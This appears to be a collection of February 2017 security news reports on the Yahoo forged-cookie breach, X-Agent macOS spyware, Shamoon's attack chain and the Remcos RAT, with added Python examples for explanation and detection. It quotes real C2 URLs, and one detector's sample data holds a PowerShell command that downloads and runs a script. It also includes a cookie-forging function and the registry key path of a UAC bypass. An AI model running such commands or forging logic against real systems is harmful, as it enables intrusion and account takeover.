The company quietly revealed the breach in a security update in December 2016, but the news was largely overlooked because the same statement disclosed a separate data breach, dating from August 2013, that involved more than 1 billion accounts.
The warning message sent Wednesday to some Yahoo users read:
"Based on the ongoing investigation, we believe a forged cookie may have been used in 2015 or 2016 to access your account."
The total number of customers affected by this attack is still unknown, though the company has confirmed that the accounts were affected by a security flaw in Yahoo's mail service.
The flaw allowed "state-sponsored attackers" to use a "forged cookie" created by software stolen from within the company's internal systems to gain access to Yahoo accounts without passwords.
"Forged cookies" are digital keys that allow access to accounts without re-entering passwords.
Here's how the attack works:
Instead of stealing passwords, the hackers forged the small tokens, called cookies, that a browser presents to tell the service that the user has already logged in.
You use cookies every time you log into any service and check that box that says "keep me logged in," or, "remember me."
So, even if you close the window, or shutdown your system, you will not have to log back into your account because the cookie stored by your browser tells the online service that you already submitted your username and password.
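The mechanism the notice describes is easier to reason about in code. The following is an added example, not Yahoo's implementation (which has not been made public): a "remember me" cookie whose authenticity rests on an HMAC over its claims with a server-held key, here the hypothetical SERVER_KEY. Whoever holds that key, whether the legitimate server or an intruder who took it from internal systems, can mint a valid cookie for any user without knowing a password, and the only server-side remedy for cookies minted with a stolen key is to rotate the key, which invalidates all of them.

```python
import base64
import hashlib
import hmac
import json
import time

# Hypothetical server-side signing key (assumption: the real service keeps an
# equivalent secret; the incident above involved such material being stolen).
SERVER_KEY = b"example-signing-key-do-not-use"
DEFAULT_TTL = 30 * 24 * 3600          # a typical "keep me logged in" lifetime


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_cookie(user: str, key: bytes, issued_at=None, ttl=DEFAULT_TTL) -> str:
    """Issue a 'remember me' cookie: base64(claims).base64(HMAC-SHA256(key, claims)).
    Nothing here checks a password: possession of `key` is the whole credential."""
    iat = int(time.time() if issued_at is None else issued_at)
    claims = json.dumps({"user": user, "iat": iat, "ttl": ttl}, sort_keys=True).encode()
    tag = hmac.new(key, claims, hashlib.sha256).digest()
    return f"{_b64(claims)}.{_b64(tag)}"


def verify_cookie(cookie: str, key: bytes, now=None):
    """Return the user name if the cookie is authentic and unexpired, else None."""
    try:
        claims_b64, tag_b64 = cookie.split(".", 1)
        claims, tag = _unb64(claims_b64), _unb64(tag_b64)
    except (ValueError, TypeError):
        return None
    expected = hmac.new(key, claims, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):      # constant-time comparison
        return None
    try:
        c = json.loads(claims)
        user, iat, ttl = c["user"], int(c["iat"]), int(c["ttl"])
    except (ValueError, KeyError, TypeError):
        return None
    now = int(time.time() if now is None else now)
    if now < iat or now > iat + ttl:                 # expired, or dated in the future
        return None
    return user


def forge_with_stolen_key(victim: str, stolen_key: bytes, when: int) -> str:
    """What an intruder holding the key can do: mint a cookie for any account.
    It is byte-for-byte the server's own mint_cookie, which is the point."""
    return mint_cookie(victim, stolen_key, issued_at=when)


if __name__ == "__main__":
    legit = mint_cookie("alice", SERVER_KEY)
    print("alice's cookie verifies as:", verify_cookie(legit, SERVER_KEY))
    forged = forge_with_stolen_key("victim", SERVER_KEY, int(time.time()))
    print("forged cookie verifies as:", verify_cookie(forged, SERVER_KEY))
    rotated = b"new-key-after-incident-response"
    print("after key rotation:", verify_cookie(forged, rotated), verify_cookie(legit, rotated))
```

Note that an attacker with the key also controls the issue time in the claims, so a server cannot distinguish forged cookies from genuine ones by age; it can only rotate the key and force every user to log in again, which is what the notification above amounts to.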
Here's what a Yahoo spokesperson said about the recently disclosed breach:
"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password."
"The investigation has identified user accounts for which we believe forged cookies were taken or used. Yahoo is in the process of notifying all potentially affected account holders."
The warning notification has been sent out to almost all affected Yahoo users, although investigations are still ongoing.
The notice was sent to Yahoo's customers on Wednesday, the same day Bloomberg reported that Verizon is cutting the price it will pay for Yahoo by at least $250 million following the revelation of two security breaches last year.
The price cut appears to indicate the troubled deal will go through.
With yet another disclosed security breach, one might think about closing online accounts associated with Yahoo.


New MacOS Malware linked to Russian Hackers Can Steal Passwords & iPhone Backups
16.2.2017 thehackernews Apple

Security researchers have discovered a new Mac malware allegedly developed by APT28, the Russian cyber espionage group believed to be responsible for the 2016 presidential election hacking scandal.
A new variant of the X-Agent spyware, previously used in cyber attacks against Windows, iOS, Android and Linux devices, now targets Apple's macOS.
The malware is designed to steal web browser passwords, take screenshots of the display, detect system configurations, execute files and exfiltrate iPhone backups stored on the computer.
The X-Agent malware is tied to Russian hacking group known as APT28 — also known as Fancy Bear, Sofacy, Sednit, and Pawn Storm — that has been operating since at least 2007 and is allegedly linked to the Russian government.
"Our past analysis of samples known to be linked to APT28 group shows a number of similarities between the Sofacy/APT28/Sednit Xagent component for Windows/Linux and the Mac OS binary that currently forms the object of our investigation," Bitdefender reported in a blog post published Tuesday.
"For once, there is the presence of similar modules, such as FileSystem, KeyLogger, and RemoteShell, as well as a similar network module called HttpChanel."
Like the variants for other platforms, the Mac version of X-Agent also acts as a backdoor with advanced cyber-espionage capabilities that can be customized depending on the objectives of an attack.

Moreover, X-Agent is being planted by Komplex, a known malware dropper and first-stage trojan that APT28 uses to infect machines, which has itself been delivered by exploiting a vulnerability in the MacKeeper software installed on targeted computers.
This evidence indicates that the newly discovered Mac version of X-Agent was also created by the same Russian hacking group.
Once successfully installed, the backdoor checks for the presence of a debugger and if it finds one, it terminates itself to prevent execution. But if not, the backdoor waits for an Internet connection to communicate with the command-and-control servers.
"After the communication has been established, the payload starts the modules. Our preliminary analysis shows most of the C&C URLs impersonate Apple domains," Bitdefender researchers said.
"Once connected to the C&C, the payload sends a HelloMessage, then spawns two communication threads running in infinite loops. The former uses POST requests to send information to the C&C, while the latter monitors GET requests for commands."
The research is still ongoing; Bitdefender's researchers currently have only the Mac malware sample and not a full picture of how an attack unfolds.
APT28 is one of the two Russian-linked cyber-espionage groups that have been accused of hacking into the U.S. Democratic National Committee's email server last year and interfering with the 2016 presidential election.
You can read BitDefender's previous analysis on the APT28 hacking group here [PDF].


Shamoon Malware Delivered via Weaponized Documents: IBM

16.2.2017 securityweek Virus
The notorious disk-wiping malware Shamoon used macro-enabled documents and PowerShell scripts to infect targeted systems, according to IBM’s X-Force Incident Response and Intelligence Services (IRIS) team.

Shamoon 2 was recently spotted in attacks aimed at Saudi Arabia and other states in the Persian Gulf. The malware, also known as Disttrack, has several variants, including one capable of targeting virtual desktop infrastructure (VDI) products.

An analysis conducted recently by Symantec showed that the attackers behind Shamoon, which many believe are based in Iran, may have been aided by a threat actor dubbed Greenbug. The security firm linked the Greenbug and Shamoon groups after discovering malware from both actors on the same system.

X-Force IRIS researchers have analyzed the recent waves of Shamoon attacks and determined that the initial breach likely took place weeks before the malware was deployed and activated.

It’s worth noting that, in many cases, Shamoon had been programmed to step into action at a specified time and date, typically when the targeted organization’s employees were less likely to notice its actions.

Experts believe the attackers used weaponized Office documents as an entry point. The documents contained a malicious macro which, when executed, initiated command and control (C&C) communications and deployed a remote shell via PowerShell.

The malicious files, which often included resumes and other human resources documents, were sent to targeted users via spear phishing emails. Some of the documents found by IBM referenced an Egypt-based software professional services organization named IT Worx, and Saudi Arabia’s Ministry of Commerce and Investment (MCI).

Once the document is opened and the macro is executed, PowerShell is invoked to provide a communications channel to the compromised device, allowing attackers to remotely execute commands on it.

The threat actor can use this access to deploy other tools and malware, and gain further access into the victim’s network. Once critical servers have been identified, the attackers can deploy Shamoon, which erases hard drives and causes systems to become inoperable.

The macro found in the documents executed two PowerShell scripts, including one served from a domain that had hosted a cross-platform remote access tool named Pupy.

IBM researchers believe the recent analysis and warnings issued by Saudi Arabia will likely cause the Shamoon attackers to once again disappear, like they did after the 2012 Saudi Aramco operation, and change their tactics for the next wave of attacks.


Microsoft Postpones February Security Updates to March 14

16.2.2017 securityweek Vulnerebility
Microsoft has informed customers that the February security updates, which the company delayed due to unspecified issues, will only be released next month as part of the planned Update Tuesday.

The February 2017 security updates should have been released on Tuesday, but the company told users that the patches had to be delayed “due to a last minute issue that could impact some customers.”

Microsoft shared an update on Wednesday, saying that the February patches will be merged with the ones scheduled for release on March 14.

Johannes B. Ullrich, dean of research at the SANS Technology Institute, believes this is “probably overall the least disruptive solution at this point.”

Since Microsoft decided to postpone the release of the security fixes by a full month, it is likely that none of the vulnerabilities they were supposed to address are critical, although many are concerned about an unpatched denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.

It’s still unclear what the last minute issue is, but many believe it could have something to do with cumulative updates. Although, some experts speculated that there may have been a different problem.

“Before the cumulative update model, a single patch could be pulled from the release without impacting the entire Patch Tuesday release. Now, speculation as to if this was an issue with one of the cumulative updates that caused this delay is not entirely unfounded, but thinking about this, if it were one update that was broken Microsoft could release everything else,” said Chris Goettl, product manager with Ivanti. “The fact is Microsoft didn't release anything, which sounds more like an infrastructure issue.”

In addition to the SMB-related vulnerability, the next security updates could patch a medium-severity information disclosure flaw discovered by Google Project Zero researchers. The weakness, tracked as CVE-2017-0038, was reported to Microsoft on November 16 and its details were disclosed on Wednesday after the 90 day deadline.

Microsoft will no longer publish security bulletins, replacing them with an online database called Security Updates Guide.


IBM shares details on the attack chain for the Shamoon malware
16.2.2017 securityaffairs Virus

Security experts at IBM have published a report that includes precious details on the attack chain of the dreaded Shamoon cyberweapon.
The Shamoon malware, aka Disttrack, has resurfaced, and government agencies and threat intelligence firms are investigating the recent string of attacks leveraging the dangerous disk wiper.

Shamoon was first detected on August 15, 2012, when Saudi Arabia's oil company Saudi Aramco announced that its systems and internal network had been hit by a cyber attack. According to the company, Shamoon infected more than 30,000 workstations.

In December 2016, security experts observed a new wave of attacks leveraging the Shamoon malware. Malware experts from Palo Alto Networks and Symantec both reported an attack on a single Saudi company.

The new variant of Shamoon, so-called Shamoon 2, overwrites the MBR of affected computers with an image of Alan Kurdi, the three-year-old Syrian boy found dead on a Turkish beach.

“Why Shamoon has suddenly returned again after four years is unknown. However, with its highly destructive payload, it is clear that the attackers want their targets to sit up and take notice,” reported Symantec.

In January, researchers at Palo Alto Networks discovered a new strain of the Shamoon 2 malware that was targeting virtualization products.

The researchers at IBM's X-Force Incident Response and Intelligence Services (IRIS) believe the Shamoon malware is a pivotal element in the information warfare between Saudi Arabia and Iran.

The malware experts identified the servers used to deliver Shamoon and gathered additional information from them to study the threat and its attack chain.

“This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:” IBM reports.

Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
Attackers can now communicate with the compromised machine and remotely execute commands on it.
The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
Attackers study the network by connecting to additional systems and locating critical servers.
The attackers deploy the Shamoon malware.
A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.

The attackers launched a spear-phishing campaign against the potential targets, impersonating a trusted party such as Saudi Arabia's Ministry of Commerce and Investment or the Egyptian software company IT Worx.

The messages come with a Word document presented as a resume, health insurance paperwork or password policy guidelines, in any case something of interest to the potential victim.

The documents include a malicious macro that starts the attack. When the victim runs the macro, it launches two PowerShell scripts.

The first script downloads and executes another PowerShell script from 139.59.46.154:3485/eiloShaegae1 via HTTP. The second script creates a memory buffer using the VirtualAlloc library call, fetches shellcode from 45.76.128.165:4443/0w0O6 via HTTP, copies it into the buffer and executes it using CreateThread. This thread then creates another buffer, fills it with a PowerShell script fetched from 45.76.128.165:4443/0w0O6 via HTTP, and runs that too.

“Based on observations associated with the malicious document, we observed subsequent shell sessions probably associated with Metasploit’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys,” continues the report.

The researchers identified two web domains used to host malicious executables and launch the attacks.

Ntg-sa[.]com, which spoofs ntg.sa.com, the legitimate domain of the Saudi petrochemical support firm Namer Trading Group.
maps-modon[.]club, which spoofs maps.modon.gov.sa, a domain associated with the Saudi Industrial Property Authority.
This information is valuable for system administrators, who can check for any connections to these domains and block them.
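Putting the indicators above to defensive use, here is an added triage example (not code from the original report) that walks endpoint and DNS events and flags the three stages the article describes: an Office process spawning PowerShell, a PowerShell command line that stages code in memory or pulls from the quoted C2 URLs, and resolutions of the two look-alike domains. The event records use a constructed dict format, not a real Sysmon or EDR schema.

```python
"""Triage of endpoint and DNS events for the Shamoon delivery chain described
above.  Added example, not code from the original report.  Event records use a
simple constructed dict format, not a real Sysmon/EDR schema; the C2 URLs and
look-alike domains are the indicators quoted in the article."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Indicators from the article (defanged brackets removed for matching).
C2_URLS = ("139.59.46.154:3485/eiloShaegae1", "45.76.128.165:4443/0w0O6")
SPOOFED_DOMAINS = {"ntg-sa.com", "maps-modon.club"}
# In-memory staging APIs and download primitives named in the article.
INMEM_API = re.compile(r"VirtualAlloc|CreateThread", re.IGNORECASE)
DOWNLOAD = re.compile(
    r"DownloadString|DownloadData|Net\.WebClient|Invoke-Expression|\bIEX\b", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path ('C:\\x\\WINWORD.EXE' -> 'winword.exe')."""
    return path.lower().rsplit("\\", 1)[-1]


def check_process(ev):
    """Return detection labels for one process-creation event."""
    hits = []
    parent, image = _basename(ev.get("parent_image", "")), _basename(ev.get("image", ""))
    cmd = ev.get("command_line", "")
    if parent in OFFICE_PARENTS and image == "powershell.exe":
        hits.append("office_spawned_powershell")          # macro stage
    if image == "powershell.exe":
        if INMEM_API.search(cmd):
            hits.append("powershell_inmemory_shellcode")  # VirtualAlloc/CreateThread stage
        if DOWNLOAD.search(cmd) and any(u in cmd for u in C2_URLS):
            hits.append("powershell_known_c2_download")
    return hits


def check_network(ev):
    """Return detection labels for one DNS/HTTP event (accepts defanged input)."""
    host = ev.get("host", "").replace("[.]", ".").lower().rstrip(".")
    return ["spoofed_domain:" + host] if host in SPOOFED_DOMAINS else []


def triage(events):
    """Run every event through the matching check; return (host_id, label) pairs."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            hits = check_process(ev)
        elif ev["type"] in ("dns", "http"):
            hits = check_network(ev)
        else:
            hits = []
        findings.extend((ev["host_id"], h) for h in hits)
    return findings


# Constructed sample telemetry for one workstation (not real captured data).
SAMPLE_EVENTS = [
    {"type": "process", "host_id": "ws-01",
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -C IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://139.59.46.154:3485/eiloShaegae1')"},
    {"type": "process", "host_id": "ws-01",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -C $b=(New-Object Net.WebClient).DownloadData("
                     "'http://45.76.128.165:4443/0w0O6'); ... VirtualAlloc ... CreateThread ..."},
    {"type": "dns", "host_id": "ws-01", "host": "maps-modon[.]club"},
    {"type": "dns", "host_id": "ws-01", "host": "maps.modon.gov.sa"},    # legitimate, no hit
    {"type": "process", "host_id": "ws-01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem"},                      # benign admin use
]

if __name__ == "__main__":
    for host_id, label in triage(SAMPLE_EVENTS):
        print(host_id, label)
```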

The experts discovered that, once a machine is infected, the attackers use it for reconnaissance, gathering information on the network and stealing sensitive data. Once this phase is complete, the attackers deploy the Shamoon payload.

Saudi Arabia is warning local organizations about the Shamoon malware; experts believe the threat actor behind these operations will continue its activity, temporarily disappearing and changing tactics.


Cyber Warriors See Politics Muddying Security Efforts

16.2.2017 securityweek Cyber

San Francisco - President Donald Trump has vowed to improve cyber attack defense, but security experts meeting this week say a fractious domestic and international political landscape could hamstring efforts to improve internet security.

As the White House mulls an executive order on cybersecurity to combat an epidemic of data breaches and hacks, participants at the annual RSA Conference voiced concern that dwindling political unity will challenge efforts to improve defense.

"The core of the problem hasn't changed; defenders have to win every time whereas attackers only have to win once," Forrester Research vice president and group director Laura Koetzle told AFP, while discussing the current state of online threats.

"What is different now is that the geopolitical situation is more unstable than it has been in quite a while."

Anti-globalization rhetoric that has been inflamed by Trump's rise and the United Kingdom's Brexit has shaken faith in the "globally interconnected world order" -- seen as upholding rules and agreements to peacefully resolve online and real-world differences between nations.

If alliances for thwarting online assaults weaken, Koetzle said, "greater testing from Russia, North Korea, China" and others can be expected, as countries test how far limits can be pushed.

The issue of cyber defense was brought to the forefront after US intelligence officials concluded Russia had carried out a series of attacks aimed at disrupting the election, possibly helping Trump's campaign.

And an unprecedented series of breaches that have compromised data on millions of US government employees, internet giants such as Yahoo and large companies like Sony Pictures present additional challenges to the administration.

'Digital Geneva Convention'

Microsoft chief legal officer Brad Smith used the RSA stage to call for a "Digital Geneva Convention" that would set lines that should not be crossed in cyber war, with an independent oversight body to identify offenders.

"Just as the Fourth Geneva Convention has long protected civilians in times of war, we now need a Digital Geneva Convention that will commit governments to protecting civilians from nation-state attacks in times of peace," Smith said during a keynote presentation.

While addressing RSA attendees, Representative Michael McCaul, a Texas Republican who heads the House Committee on Homeland Security, was among those warning of looming cyber threats.

"There is no doubt in my mind that the Russian government tried to undermine our elections," McCaul said.

"Cyber intrusion has the potential to change the very fabric of our democracy."

Sameer Bhalotra, co-chair of a task force formed to advise Trump at the Center for Strategic and International Studies, said the country needs an agency that investigates cyber attacks.

He said the administration's stance on reducing regulation could speed the adoption of national computer security standards, because there would be less worry about being tethered by rules.

Technology and trust

Cyber policy task force co-chair Karen Evans had advised the administration to consider data as belonging to the user -- an approach that could bolster arguments against weakening encryption or building in back doors to access people's data.

The task force also strongly advocated bulking cyber defenses and ramping up the cost of attacks to discouraging levels, while urging the government to rely on the private sector.

Trump had been expected to release an executive order focused on cyber security early this week, but it was unclear Wednesday when it might land.

Recommendations from the task force included a few radical ideas, such as befriending hackers and promoting "bug bounties" to reward those who discover system vulnerabilities, said Nico Sell, co-founder of encrypted messaging service Wickr.

"If the administration expects an improvement in how we deal with cyber incidents, they will have to figure out how to foster trust -- especially in this charged environment," Koetzle said. "The poisoning of politics fosters a tendency of not collaborating with institutions, and that is when things break down; especially in cyber security."


Yahoo Notifies Users of Sophisticated Breach Methods

16.2.2017 securityweek Safety
Yahoo said Wednesday it was notifying some users that hackers may have been able to use a maneuver to break into their accounts without stealing passwords.

The latest notifications were in response to the record breach disclosed late last year affecting an estimated one billion users -- which involved forging of "cookies" or files used to authenticate users when they log into their accounts.

The notification indicates the investigation into the attacks is in its final stage, according to a source familiar with the matter, noting that messages had been sent to "a reasonably final list" of Yahoo users.

A Yahoo spokesman said the company was notifying all potentially affected users and that it had "invalidated" the forged cookies.

"As we have previously disclosed, our outside forensic experts have been investigating the creation of forged cookies that could have enabled an intruder to access our users' accounts without a password," the company said in a statement.

"The investigation has identified user accounts for which we believe forged cookies were taken or used."

Yahoo announced in September that hackers in 2014 stole personal data from more than 500 million of its user accounts. It admitted another cyber attack in December, this one dating from 2013, affecting more than a billion users.

The data breaches have been a major embarrassment for a former internet leader that is in the process of selling its core operations to telecom giant Verizon for $4.8 billion.

Some reports Wednesday said the two companies had agreed to discount the price by $250 million to $300 million following disclosure of the attacks.

Neither Yahoo nor Verizon commented on the reports.

Yahoo is selling its main operating business as a way to separate that from its more valuable stake in Chinese internet giant Alibaba.

The shareholding entity, to be renamed Altaba, Inc., will act as an investment company.


There Is Practically No Defense: The Viruses Erase All Their Traces

15.2.2017 Novinky/Bezpečnost Viruses
Last year saw a veritable flood of ransomware viruses. They could wreak serious havoc on an infected machine, but at least the user immediately knew where they stood: the uninvited guests demanded a ransom almost at once. This year's new wave of attacks is far more serious, because the malicious code plays hide-and-seek with users.
Ransomware attacks practically always follow the same script. The intruder encrypts the data stored on the hard drive. The attackers try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly imposed for using illegal software or the like.

Even after paying the ransom, users may not get their data back. Instead of paying, it is necessary to remove the virus from the computer and decrypt the data, which may not be easy at all, and in some cases is not possible at all.

In any case, the user notices the activity of the computer virus practically immediately after it settles into the computer. If they have a backup of their data, it is enough to reinstall the operating system and they are no longer at risk.

Trying to stay hidden
Security experts at the antivirus company Kaspersky Lab have now warned that so-called invisible targeted attacks are multiplying. As the name suggests, the attackers try to stay hidden for as long as possible.

“Invisible attacks use only legitimate software, such as widely available penetration-testing and administration tools or the PowerShell framework for automating tasks in Windows. They leave no malware files on the hard drive; instead they hide them in memory,” the security experts noted.

This makes it much harder to detect the malicious code on the infected machine. Normally, traces of hacker activity can be found on hard drives even a year after the attack. When the data is hidden in memory, it is automatically erased the first time the computer is restarted.

“The attackers stay in the system only as long as strictly necessary, gathering information before their traces are wiped by the first reboot,” the experts added.

Companies are the main target
Cybercriminals use this tactic mainly in attacks on companies. It cannot be ruled out, however, that they will soon apply the same approach to attacks on end users.

Kaspersky Lab has so far detected similar attacks on more than forty companies in Europe, the USA, South America and other parts of the world. The attackers focus mainly on banks, telecommunications companies and, not least, government organizations. Whether a similar attack has taken place in the Czech Republic is not clear at this point.


Easy-to-Use Remcos RAT Spotted in Live Attacks

15.2.2017 Securityweek Virus

After receiving numerous improvements, a Remote Administration Tool (RAT) that emerged last year on hacking forums was recently observed in live attacks, Fortinet security researchers reveal.

Dubbed Remcos, the RAT was put up for sale during the second half of 2016 and is currently available starting at $58 and going up to $389, depending on the selected license period and number of "masters" or clients. Available as version 1.7.3 at the moment, the malware is distributed via malicious Office documents named Quotation.xls or Quotation.doc, supposedly delivered via email.

The malicious documents include obfuscated macros designed to call shell commands to bypass User Account Control (UAC) and execute the malware with elevated privileges, researchers say. Abusing Event Viewer (eventvwr.exe) for privilege escalation, the UAC-bypass technique has been adopted by various threats recently, including ransomware.

The Remcos RAT ships with only the UPX and MPRESS1 packers to compress and obfuscate its server component, but the analyzed sample revealed an extra custom packer on top of MPRESS1, and no other obfuscation beyond this. The server component was built from the latest Remcos v1.7.3 Pro variant, which was released on Jan. 23, 2017, the developer’s website shows.

The code also revealed the commands that the server can carry out, all of which are also included in the free, stripped down client version available through the developer’s website. The Remcos Client features five main tabs, each with specific functions, namely Connections, Automatic Tasks, Local Settings, Builder, and Event Log.

Through the Connections tab, one can monitor all active connections and can view basic information on the installed server component and the infected system for each of them, Fortinet explains. What’s more, this tab allows the sending of commands to the infected system, allowing an actor to take screenshots of the targeted machine, search for files, view running processes, execute commands, log keystrokes, steal passwords, access the webcam and microphone, download and execute code, and more.

While most of the commands are common to RATs, the Automatic Tasks tab in Remcos is a feature new to applications in this category. Through it, the server component can be configured to automatically execute functions without any manual action from the client once a connection has been established. Through this feature, an actor can easily create an infiltrate-exfiltrate-exit scheme that doesn’t require manual triggers, something usually seen in spyware or malware downloaders, the security researchers say.

The Local Settings tab provides access to settings for the client side, allowing an attacker to set which ports on the client machine the server should connect to, as well as the passwords that should be used. The same password is required on both the listening port and the connecting server, because Remcos uses the password for both authentication and as a key for encrypting network traffic using a simple RC4 algorithm.

The Builder tab allows wannabe criminals to customize the parameters of the server binary. This tab features a series of sub-sections, including Connection (to set client IP addresses and ports for the server to connect to upon installation), Installation (to set installation path, autorun registries, and a watchdog module, along with a UAC bypass), Stealth (set system tray icon behavior and basic anti-analysis/anti-sandbox routines), Keylogger (set basic keylogger functions and an option to remove browser cookies and stored passwords), Surveillance (set the option to take screenshots periodically or when specific windows are active), and Build (to pack the server binary using UPX and MPRESS).

“It is possible that the attacker only used the document macro as a template to download and execute the binary, and never intended to use the script’s UAC bypass since the server binary itself already has the same function. In fact, it uses the same UAC bypass technique, but this time with an added routine to revert the modified registry after gaining privilege. This is logical, because not restoring the registry can produce system errors that can cause suspicion from the user every time an .msc file needs to be opened,” the researchers say.
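The plant-then-revert behaviour described in that quote is itself a usable detection signal. The following added example (not Fortinet's analysis code or the RAT's) correlates a write to the per-user .msc handler key that eventvwr.exe consults with a launch of eventvwr.exe shortly after, and records whether the key was removed again afterwards; the event records are constructed in a simple dict format, not a real Sysmon schema.

```python
"""Detection of the Event Viewer (eventvwr.exe) UAC bypass the article says
Remcos uses, including the follow-up registry revert it describes.
Added example, not Fortinet's analysis code or the RAT's.  The key path is the
real per-user mscfile handler that eventvwr.exe consults; the event records
below are constructed in a simple dict format, not a real Sysmon schema."""
from datetime import datetime, timedelta

# Per-user handler for .msc files; a command planted here runs elevated
# when the auto-elevating eventvwr.exe opens its console.
HIJACK_KEY = r"hkcu\software\classes\mscfile\shell\open\command"
WINDOW = timedelta(seconds=60)   # max gap between the registry write and eventvwr.exe


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def _is_hijack_key(ev):
    return ev["key"].lower().startswith(HIJACK_KEY)


def detect_eventvwr_bypass(events):
    """One finding per (host, hijack write) where eventvwr.exe started within
    WINDOW of the write.  'reverted' records whether the key was later removed:
    a planted-then-deleted handler is exactly the clean-up behaviour described
    for the Remcos server binary, so it is reported rather than treated as benign."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for host, evs in by_host.items():
        for w in (e for e in evs if e["type"] == "reg_set" and _is_hijack_key(e)):
            t0 = _ts(w["time"])
            launched = any(e["type"] == "process"
                           and e["image"].lower().endswith("\\eventvwr.exe")
                           and t0 <= _ts(e["time"]) <= t0 + WINDOW for e in evs)
            if not launched:
                continue
            reverted = any(e["type"] == "reg_delete" and _is_hijack_key(e)
                           and _ts(e["time"]) > t0 for e in evs)
            findings.append({"host": host, "writer": w["process"],
                             "planted": w["value"], "reverted": reverted})
    return findings


# Constructed sample events (not real telemetry); payload paths are placeholders.
SAMPLE_EVENTS = [
    # ws-07: full chain -- handler planted by cmd.exe (as the macro's shell
    # command would), eventvwr.exe started seconds later, key deleted afterwards.
    {"host": "ws-07", "time": "2017-02-10 09:14:02", "type": "reg_set", "process": "cmd.exe",
     "key": r"HKCU\Software\Classes\mscfile\shell\open\command",
     "value": r"C:\Users\Public\placeholder_payload.exe"},
    {"host": "ws-07", "time": "2017-02-10 09:14:05", "type": "process",
     "image": r"C:\Windows\System32\eventvwr.exe"},
    {"host": "ws-07", "time": "2017-02-10 09:14:09", "type": "reg_delete",
     "process": "placeholder_payload.exe",
     "key": r"HKCU\Software\Classes\mscfile\shell\open\command"},
    # ws-12: unrelated per-user file association change, then eventvwr.exe -> no finding.
    {"host": "ws-12", "time": "2017-02-10 10:00:00", "type": "reg_set", "process": "explorer.exe",
     "key": r"HKCU\Software\Classes\txtfile\shell\open\command", "value": "notepad.exe %1"},
    {"host": "ws-12", "time": "2017-02-10 10:00:03", "type": "process",
     "image": r"C:\Windows\System32\eventvwr.exe"},
    # ws-19: hijack key written but eventvwr.exe only ran much later -> outside WINDOW.
    {"host": "ws-19", "time": "2017-02-10 11:00:00", "type": "reg_set", "process": "powershell.exe",
     "key": r"HKCU\Software\Classes\mscfile\shell\open\command", "value": "placeholder_tool.exe"},
    {"host": "ws-19", "time": "2017-02-10 11:30:00", "type": "process",
     "image": r"C:\Windows\System32\eventvwr.exe"},
]

if __name__ == "__main__":
    for finding in detect_eventvwr_bypass(SAMPLE_EVENTS):
        print(finding)
```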

The Event Log tab was meant to display connection logs with the server, as well as information regarding the client’s status (updates, ports, etc.). There is also an About tab, which contains acknowledgements and some promotions on other products by an author named Viotto.

Fortinet also points out that this RAT once again shows that one doesn’t have to be an expert to launch fairly sophisticated malware attacks: “More and more applications like Remcos are being released publicly, luring new perpetrators with their easy usage. And all it takes to be infected by one are a few clicks.”

Remcos’ author supposedly attempts to discourage malicious usage of the tool by means of license bans, but only if such misuse is reported. According to Fortinet, such claims are often “nothing but a false shield” that RAT authors use to protect themselves from liability when the application is exposed as a full-blown malware builder.


Study Shows Exposure of Critical Sectors, ICS in U.S.

15.2.2017 Securityweek ICS

A study conducted by Trend Micro using the Shodan search engine provides some useful information on the exposure of critical infrastructure and industrial systems in the United States.

The study, based on a Shodan search performed in February 2016, targeted cyber assets in critical infrastructure and other sectors (e.g. government, emergency, healthcare, utilities, financial services and education), and industrial control systems (ICS), such as the ones used for building automation, manufacturing processes, power generation and traffic system management.

Researchers determined that in the government sector a majority of the exposed cyber assets were firewalls (48%), wireless access points (13%), specialized devices (9%), routers (6%) and other security devices (6%). Several unpatched servers have been found in these organizations, including ones running Apache Tomcat, Microsoft IIS and Apache HTTPD.

The study showed that the number of cyber assets exposed in Washington, DC is smaller than in Lafayette, Indiana, and Saint Paul, Minnesota.

Lafayette and Houston, Texas, have the highest number of exposed cyber assets associated with emergency services, although only a few hundred were discovered in each of these cities.

Firewalls, printers and routers account for a majority of the exposed devices in the emergency services sector. Trend Micro pointed out that vulnerable servers have not been identified in these organizations.

While the healthcare industry has been increasingly targeted by cybercriminals, the Shodan search showed a relatively small number of exposed assets in this sector, mainly firewalls and other security devices. On the other hand, some vulnerable servers were exposed by these organizations. The highest number of exposed assets were identified in Cambridge and New York City.

When it comes to the utilities sector, Trend Micro has determined that the exposed cyber assets are primarily located in small cities and towns. The largest number of devices, which are mainly wireless access points and firewalls, were discovered in Clarksville, Hopkinsville, Braintree, Ocala and Bismarck.

In the financial sector, New York City has the highest number of exposed assets (nearly 15,000), which is not surprising considering that the city is a global financial center. Firewalls and other security devices account for more than 90 percent of the exposed devices in this sector.

